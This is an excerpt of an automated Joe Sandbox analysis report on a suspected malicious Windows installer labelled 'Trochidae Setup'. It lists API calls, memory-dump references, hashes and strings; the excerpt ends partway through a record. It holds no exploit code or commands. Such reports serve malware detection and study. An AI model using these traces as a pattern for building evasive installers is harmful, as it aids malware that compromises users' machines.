• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
• Opcode ID: a663e1ee88aff6bb8d151cd1cce8982361632cb1983bd685a1e33b20e6578072
• Instruction ID: fe35eca7c2654f279d717fea31bdeaa6937bb5491eee9e26a1e5aab6719f7fed
• Opcode Fuzzy Hash: a663e1ee88aff6bb8d151cd1cce8982361632cb1983bd685a1e33b20e6578072
• Instruction Fuzzy Hash: B2E04F31A003256BDB213EB25E8ED6F3669AB84744B16113BFA01BA2C2D9BC1C05C26D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402BDD,00000000,?,?), ref: 00405EB7
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
• Instruction ID: 95beb03159e1ed36dc188c03c0911f4594c5194c551a9f11594fd4679c6f4357
• Opcode Fuzzy Hash: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
• Instruction Fuzzy Hash: 23E0ECB2014109BEEF095F90ED0ADBB371DEB04315F00492EFA06E4090E7B5A920AA75
Uniqueness
• Uniqueness Score: -1.00%

APIs
• WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,00000020,?,004031B8,00000000,004128C0,00000020,004128C0,00000020,000000FF,?,00000000), ref: 00405C2E
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
• Instruction ID: 28dd51bc99cbbe9e43bc3b4155210361b58306b45153a5fd00399a3e640b4bcc
• Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
• Instruction Fuzzy Hash: 3AE0EC3261835AABEF249E559C01EEB7B6CEB05360F044472FD15E6150D231E8219FA9
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,004031EA,00000000,00000000,00403047,000000FF,?,00000000,00000000,00000000), ref: 00405BFF
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
• Instruction ID: 7d11c2845e787d99b8eae26fbbcce04266139d1862b3a193897eab19ac9c5e73
• Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
• Instruction Fuzzy Hash: 72E0E632558759ABDF106E559C00AEB775CEB45754F004832FE15E3150D231E8519BE9
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNELBASE(6FE9404C,?,?,6FE9403C), ref: 6FE9293F
Memory Dump Source
• Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
• Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 2c864d7bb0a215fd2fe01a28caa1ea409da5754702e90e1f3d5bbb553bd48ba8
• Instruction ID: 9504bce6739133cba9b87601e2b507cfd40423ebcf535ef3a7c1905787eb4fbb
• Opcode Fuzzy Hash: 2c864d7bb0a215fd2fe01a28caa1ea409da5754702e90e1f3d5bbb553bd48ba8
• Instruction Fuzzy Hash: 60F09BB1908A84DECB60CF6988967053FE2B71B368B12C52BE568D6341E33648648B33
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004023DA
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: PrivateProfileString
• String ID:
• API String ID: 1096422788-0
• Opcode ID: a930ba4684606d166f004347e567f9e530680cf266d7567c4f89b64240fb8247
• Instruction ID: 87433fbf28b19ed2e9e97c64dce3a42f5842ec6a66e9b0e36d30645c49e8dc10
• Opcode Fuzzy Hash: a930ba4684606d166f004347e567f9e530680cf266d7567c4f89b64240fb8247
• Instruction Fuzzy Hash: 92E01230904309BAEB02AFB08D09EBE3E79EF05710F10042AB9606A0D2E6B89542D75E
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EEE,?,?,?,?,00000002,Call), ref: 00405E84
Memory Dump Source
• Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
• Instruction ID: 31d842323d9a2f535784a2c12e989c9eb1b9f9f44251d53ba3eec0f14c414acf
• Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
• Instruction Fuzzy Hash: 75D0EC3204420DBADF115F90ED05FAB371DEB14355F004522FE05A4090D2769520AA55
Uniqueness
• Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNELBASE(00000000,?,?), ref: 004015A8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 479e8351d0654c961f05b900a28070053bee6eceb2280e12bb67dca2ecaab8d8
                                                                                        • Instruction ID: d5005c83e4bc13d794db0995845c4037c46dc405a88debeb1123cd551caf7fcc
                                                                                        • Opcode Fuzzy Hash: 479e8351d0654c961f05b900a28070053bee6eceb2280e12bb67dca2ecaab8d8
                                                                                        • Instruction Fuzzy Hash: F5D05BB2B08200EBCB11DFE8EF08A5E77B5EB54325F204577E101F21D1D2B88641975A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SendMessageA.USER32(00010410,00000000,00000000,00000000), ref: 004040C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                                                                        • Instruction ID: d19a9dbcf4508c1e9b2ca47d0762ffb16ec5c10abf7e35186d5f4f0c6b5da105
                                                                                        • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                                                                        • Instruction Fuzzy Hash: F9C04C71754201BAEA319B50DD49F0777586750B00F5584257314F60D1C6B4E451D62D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,?), ref: 004031FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                                                        • Instruction ID: 8831d3de15784b4579c3d7b303db9b45d0c358e109056f74ce618eb3ecc3c243
                                                                                        • Opcode Fuzzy Hash: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                                                        • Instruction Fuzzy Hash: 74B01231544200BFDB214F00DE05F057B21A790700F10C030B344780F082712460EB5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,?,?,00403ECD), ref: 004040AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                                                        • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                                                                        • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                                                        • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ShellExecuteExA.SHELL32(?,004044AF,?), ref: 004056CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExecuteShell
                                                                                        • String ID:
                                                                                        • API String ID: 587946157-0
                                                                                        • Opcode ID: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
                                                                                        • Instruction ID: 740202cceb9cd72bfbe3504c5fe3e084c22a481b72cb9b9ac8673d70f1f22f9b
                                                                                        • Opcode Fuzzy Hash: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
                                                                                        • Instruction Fuzzy Hash: 45C092B2404200DFE301CF90CB58F077BE8AB55306F028054E1849A2A0C378A800CB7A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00403E66), ref: 00404094
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                                                                        • Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
                                                                                        • Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                                                                        • Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GlobalAlloc.KERNELBASE(?,6FE91233,?,6FE912CF,-6FE9404B,6FE911AB,-000000A0), ref: 6FE9121D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocGlobal
                                                                                        • String ID:
                                                                                        • API String ID: 3761449716-0
                                                                                        • Opcode ID: a07738ff40be5644d9217f29b6564a36b6ed8259a155f33307c19528ab4ac649
                                                                                        • Instruction ID: dce5a29286c7a9513d32bd255b0941f647a354b14865d914297dee5144301a3e
                                                                                        • Opcode Fuzzy Hash: a07738ff40be5644d9217f29b6564a36b6ed8259a155f33307c19528ab4ac649
                                                                                        • Instruction Fuzzy Hash: 30A00175944900DADE519AE1891AA183E26A74B721F008042E32954194866640209B36
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404549
                                                                                        • SetWindowTextA.USER32(00000000,?), ref: 00404573
                                                                                        • SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 00404624
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0040462F
                                                                                        • lstrcmpiA.KERNEL32(Call,Trochidae Setup: Installing), ref: 00404661
                                                                                        • lstrcatA.KERNEL32(?,Call), ref: 0040466D
                                                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040467F
                                                                                          • Part of subcall function 004056DA: GetDlgItemTextA.USER32(?,?,00000400,004046B6), ref: 004056ED
                                                                                          • Part of subcall function 00406244: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\jU0hAXFL0k.exe",76403410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 0040629C
                                                                                          • Part of subcall function 00406244: CharNextA.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004062A9
                                                                                          • Part of subcall function 00406244: CharNextA.USER32(?,"C:\Users\user\Desktop\jU0hAXFL0k.exe",76403410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 004062AE
                                                                                          • Part of subcall function 00406244: CharPrevA.USER32(?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 004062BE
                                                                                        • GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,?,0041ECD8,?,?,000003FB,?), ref: 0040473D
                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404758
                                                                                          • Part of subcall function 004048B1: lstrlenA.KERNEL32(Trochidae Setup: Installing,Trochidae Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
                                                                                          • Part of subcall function 004048B1: wsprintfA.USER32 ref: 00404957
                                                                                          • Part of subcall function 004048B1: SetDlgItemTextA.USER32(?,Trochidae Setup: Installing), ref: 0040496A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$Call$Trochidae Setup: Installing
                                                                                        • API String ID: 2624150263-3291086599
                                                                                        • Opcode ID: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
                                                                                        • Instruction ID: a574bab901635a86c0a25b0ea1efcbf713871747dcedb108b051a9d89a4042ab
